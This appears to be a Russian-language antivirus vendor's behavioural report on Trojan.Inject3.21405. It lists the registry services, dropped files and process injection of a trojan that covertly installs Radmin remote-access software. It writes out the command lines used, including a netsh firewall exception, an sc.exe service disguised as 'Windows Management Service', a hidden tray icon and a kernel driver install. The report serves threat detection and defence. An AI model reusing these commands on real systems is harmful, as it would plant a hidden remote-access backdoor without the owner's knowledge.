Trojan.Inject3.21405

Техническая информация

Для обеспечения автозапуска и распространения

Создает следующие сервисы

[<HKLM>\System\CurrentControlSet\Services\mirrorv3] 'Start' = '00000001'
[<HKLM>\System\CurrentControlSet\Services\mirrorv3] 'ImagePath' = 'system32\DRIVERS\rminiv3.sys'
[<HKLM>\System\CurrentControlSet\Services\rserver3] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\rserver3] 'ImagePath' = 'C:\ntr\deploy\radmin\rserver3.exe /service'
[<HKLM>\System\CurrentControlSet\Services\raddrvv3] 'Start' = '00000001'
[<HKLM>\System\CurrentControlSet\Services\raddrvv3] 'ImagePath' = 'C:\ntr\deploy\radmin\dep\x86\raddrvv3.sys'

Вредоносные функции

Запускает на исполнение

'<SYSTEM32>\netsh.exe' firewall add allowedprogram "C:\ntr\deploy\radmin\rserver3.exe" "Windows Management Service" ENABLE

Внедряет код в

следующие пользовательские процессы:

famitrfc.exe

Изменения в файловой системе

Создает следующие файлы

C:\ntr\deploy\radmin\dep\x64\mirrorv3.cat
C:\ntr\deploy\radmin\extra\vcintsx.dll
C:\ntr\deploy\radmin\extra\voicex.dll
C:\ntr\deploy\radmin\famitrf2.exe
C:\ntr\deploy\radmin\famitrfc.exe
C:\ntr\deploy\radmin\rcursor.dll
C:\ntr\deploy\radmin\rserver3.exe
C:\ntr\deploy\radmin\r_sui.dll
C:\ntr\deploy\radmin\winlpcdl.dll
C:\ntr\deploy\radmin\winlpcdl2.dll
C:\ntr\deploy\radmin\wsock32.dll
C:\ntr\deploy\radmin\extra\rsl.exe
C:\ntr\deploy\radmin\extra\vcintcx.dll
%TEMP%\tp.inf
%WINDIR%\security\database\edbres00001.jrs
%WINDIR%\security\database\edbres00002.jrs
%WINDIR%\security\database\edb.log
%WINDIR%\security\database\tmp.edb
%WINDIR%\security\database\edb.chk
%TEMP%\tp.sdb
nul
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd4ef.tmp
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd573.tmp
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd5f6.tmp
%TEMP%\tp.log
%WINDIR%\security\database\edbtmp.log
C:\ntr\deploy\radmin\extra\rsetup64.exe
C:\ntr\deploy\radmin\extra\rsetup.exe
C:\ntr\deploy\radmin\extra\rschatx.dll
C:\ntr\deploy\radmin\dep\x64\radmin30.reg
C:\ntr\deploy\radmin\dep\x86\mirrorv3.cat
C:\ntr\deploy\radmin\dep\x86\mirrorv3.inf
C:\ntr\deploy\radmin\dep\x86\radmin30.reg
C:\ntr\deploy\radmin\extra\eula.txt
C:\ntr\deploy\radmin\extra\radmin30.chm
C:\ntr\deploy\radmin\extra\radmin30.chw
C:\ntr\deploy\radmin\inst.cmd
C:\ntr\deploy\radmin\uninst.cmd
C:\ntr\deploy\radmin\dep\x64\devcon64.exe
C:\ntr\deploy\radmin\dep\x64\mirrorv3.dll
C:\ntr\deploy\radmin\dep\x64\mirrorv3.inf
C:\ntr\deploy\radmin\dep\x64\raddrvv3.sys
C:\ntr\deploy\radmin\dep\x86\devcon.exe
C:\ntr\deploy\radmin\dep\x86\mirrorv3.dll
C:\ntr\deploy\radmin\dep\x86\raddrvv3.sys
C:\ntr\deploy\radmin\dep\x86\rminiv3.sys
C:\ntr\deploy\radmin\extra\chatlpcx.dll
C:\ntr\deploy\radmin\extra\fam64helper.exe
C:\ntr\deploy\radmin\extra\firewallinstallhelper.dll
C:\ntr\deploy\radmin\extra\nts64helper.dll
C:\ntr\deploy\radmin\extra\raudiox.dll
C:\ntr\deploy\radmin\extra\rchatx.dll
C:\ntr\deploy\radmin\extra\rsaudiox.dll
C:\ntr\deploy\radmin\dep\x64\rminiv3.sys
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd683.tmp
<SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\oem2.cat

Присваивает атрибут 'скрытый' для следующих файлов

<SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\oem2.cat

Удаляет следующие файлы

%TEMP%\tp.inf
%TEMP%\tp.log
%TEMP%\tp.sdb
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\mirrorv3.cat
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\mirrorv3.dll
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\mirrorv3.inf
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\rminiv3.sys

Перемещает следующие файлы

%WINDIR%\security\database\edbtmp.log в %WINDIR%\security\database\edb.log
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd4ef.tmp в %TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\rminiv3.sys
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd573.tmp в %TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\mirrorv3.cat
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd5f6.tmp в %TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\mirrorv3.dll
%TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\setd683.tmp в %TEMP%\{52c471c7-8ad7-4926-a9fb-295d04a60514}\mirrorv3.inf

Подменяет следующие файлы

%WINDIR%\security\database\edbtmp.log

Другое

Ищет следующие окна

ClassName: 'RegEdit_RegEdit' WindowName: ''

Создает и запускает на исполнение

'C:\ntr\deploy\radmin\dep\x86\devcon.exe' update mirrorv3.inf radmin_mirror_v3
'C:\ntr\deploy\radmin\dep\x86\devcon.exe' install mirrorv3.inf radmin_mirror_v3
'C:\ntr\deploy\radmin\rserver3.exe' /service
'C:\ntr\deploy\radmin\famitrfc.exe'
'C:\ntr\deploy\radmin\famitrf2.exe'
'<SYSTEM32>\cmd.exe' /c ""C:\ntr\deploy\radmin\inst.cmd" "' (со скрытым окном)

Запускает на исполнение

'<SYSTEM32>\cmd.exe' /c ""C:\ntr\deploy\radmin\inst.cmd" "
'<SYSTEM32>\secedit.exe' /configure /db %TEMP%\tp.sdb /cfg %TEMP%\tp.inf /log %TEMP%\tp.log
'<SYSTEM32>\reg.exe' Query "HKLM\Hardware\Description\System\CentralProcessor\0"
'<SYSTEM32>\find.exe' /i "x86"
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v "HideTrayIcon" /t REG_DWORD /d "0x00000001" /f
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v "LicenseText" /t REG_SZ /d "License valid." /f
'%WINDIR%\regedit.exe' /s radmin30.reg
'<SYSTEM32>\sc.exe' create rserver3 binpath= "C:\ntr\deploy\radmin\rserver3.exe /service" type= own type= interact start= auto DisplayName= "Windows Management Service"
'<SYSTEM32>\sc.exe' description rserver3 "Windows Management Service for WMI service calls"
'<SYSTEM32>\sc.exe' create raddrvv3 binpath= "C:\ntr\deploy\radmin\dep\x86\raddrvv3.sys" type= kernel start= system group= Base DisplayName= "raddrvv3"
'<SYSTEM32>\net.exe' start raddrvv3
'<SYSTEM32>\net1.exe' start raddrvv3
'<SYSTEM32>\net.exe' start rserver3
'<SYSTEM32>\net1.exe' start rserver3